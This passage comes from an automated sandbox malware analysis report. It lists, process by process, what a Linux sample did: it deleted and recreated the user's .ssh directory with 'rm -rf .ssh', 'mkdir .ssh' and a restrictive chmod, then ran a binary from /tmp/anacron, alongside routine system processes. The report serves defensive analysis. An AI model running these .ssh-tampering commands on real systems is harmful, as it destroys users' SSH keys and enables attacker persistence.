Start time: 02:47:29 Start date: 20/01/2020 Path: /bin/rm Arguments: rm -rf .ssh File size: 60272 bytes MD5 hash: b79876063d894c449856cca508ecca7f
File Activities
File Deleted
File Read
Analysis Process: sh PID: 20764 Parent PID: 20759
General
Start time: 02:47:29 Start date: 20/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c
Analysis Process: mkdir PID: 20764 Parent PID: 20759
Copyright Joe Security LLC 2020 Page 17 of 23 General
Start time: 02:47:29 Start date: 20/01/2020 Path: /bin/mkdir Arguments: mkdir .ssh File size: 76848 bytes MD5 hash: a97f666f21c85ec62ea47d022263ef41
File Activities
File Read
Directory Created
Analysis Process: sh PID: 20771 Parent PID: 20759
General
Start time: 02:47:29 Start date: 20/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c
Analysis Process: chmod PID: 20771 Parent PID: 20759
General
Start time: 02:47:29 Start date: 20/01/2020 Path: /bin/chmod Arguments: chmod -R go= /home/user/.ssh File size: 56112 bytes MD5 hash: 32c8c7318223ebc5b934a78cfc153d6f
File Activities
File Read
Directory Enumerated
Permission Modified
Analysis Process: anacron PID: 20780 Parent PID: 20758
General
Start time: 02:47:29 Start date: 20/01/2020 Path: /tmp/anacron Arguments: n/a File size: 2902776 bytes MD5 hash: 8d5d71c56b1f807edac5ac734feab41a
File Activities Copyright Joe Security LLC 2020 Page 18 of 23 File Read
File Written
Analysis Process: upstart PID: 20811 Parent PID: 20139
General
Start time: 02:47:31 Start date: 20/01/2020 Path: /sbin/upstart Arguments: n/a File size: 0 bytes MD5 hash: 00000000000000000000000000000000
Analysis Process: sh PID: 20811 Parent PID: 20139
General
Start time: 02:47:31 Start date: 20/01/2020 Path: /bin/sh Arguments: /bin/sh -e /proc/self/fd/9 File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c
File Activities
File Read
Analysis Process: sh PID: 20812 Parent PID: 20811
General
Start time: 02:47:31 Start date: 20/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c
Analysis Process: date PID: 20812 Parent PID: 20811
General
Start time: 02:47:31 Start date: 20/01/2020 Path: /bin/date Arguments: date File size: 68464 bytes MD5 hash: 54903b613f9019bfca9f5d28a4fff34e
File Activities
Copyright Joe Security LLC 2020 Page 19 of 23 File Read
Analysis Process: sh PID: 20813 Parent PID: 20811
General
Start time: 02:47:31 Start date: 20/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c
Analysis Process: apport-checkreports PID: 20813 Parent PID: 20811
General
Start time: 02:47:31 Start date: 20/01/2020 Path: /usr/share/apport/apport-checkreports Arguments: /usr/bin/python3 /usr/share/apport/apport-checkreports --system File size: 1269 bytes MD5 hash: 1a7d84ebc34df04e55ca3723541f48c9
File Activities
File Read
File Written
Directory Enumerated
Analysis Process: upstart PID: 20838 Parent PID: 20139
General
Start time: 02:47:31 Start date: 20/01/2020 Path: /sbin/upstart Arguments: n/a File size: 0 bytes MD5 hash: 00000000000000000000000000000000
Analysis Process: sh PID: 20838 Parent PID: 20139
General
Start time: 02:47:31 Start date: 20/01/2020 Path: /bin/sh Arguments: /bin/sh -e /proc/self/fd/9 File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c
Copyright Joe Security LLC 2020 Page 20 of 23 File Activities
File Read
Analysis Process: sh PID: 20839 Parent PID: 20838
General
Start time: 02:47:31 Start date: 20/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c
Analysis Process: date PID: 20839 Parent PID: 20838
General
Start time: 02:47:31 Start date: 20/01/2020 Path: /bin/date Arguments: date File size: 68464 bytes MD5 hash: 54903b613f9019bfca9f5d28a4fff34e
File Activities
File Read
Analysis Process: sh PID: 20855 Parent PID: 20838
General
Start time: 02:47:31 Start date: 20/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c
Analysis Process: apport-gtk PID: 20855 Parent PID: 20838
General
Start time: 02:47:31 Start date: 20/01/2020 Path: /usr/share/apport/apport-gtk Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk File size: 23806 bytes MD5 hash: ec58a49a30ef6a29406a204f28cc7d87
File Activities
Copyright Joe Security LLC 2020 Page 21 of 23 File Read
File Written
Directory Enumerated
Analysis Process: upstart PID: 20868 Parent PID: 20139
General
Start time: 02:47:31 Start date: 20/01/2020 Path: /sbin/upstart Arguments: n/a File size: 0 bytes MD5 hash: 00000000000000000000000000000000
Analysis Process: sh PID: 20868 Parent PID: 20139
General
Start time: 02:47:31 Start date: 20/01/2020 Path: /bin/sh Arguments: /bin/sh -e /proc/self/fd/9 File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c
File Activities
File Read
Analysis Process: sh PID: 20869 Parent PID: 20868
General
Start time: 02:47:31 Start date: 20/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c
Analysis Process: date PID: 20869 Parent PID: 20868
General
Start time: 02:47:31 Start date: 20/01/2020 Path: /bin/date Arguments: date File size: 68464 bytes MD5 hash: 54903b613f9019bfca9f5d28a4fff34e
Copyright Joe Security LLC 2020 Page 22 of 23 File Activities
File Read
Analysis Process: sh PID: 20870 Parent PID: 20868
General
Start time: 02:47:31 Start date: 20/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c
Analysis Process: apport-gtk PID: 20870 Parent PID: 20868
General
Start time: 02:47:31 Start date: 20/01/2020 Path: /usr/share/apport/apport-gtk Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk File size: 23806 bytes MD5 hash: ec58a49a30ef6a29406a204f28cc7d87
File Activities
File Read
Directory Enumerated
Copyright Joe Security LLC 2020
Copyright Joe Security LLC 2020 Page 23 of 23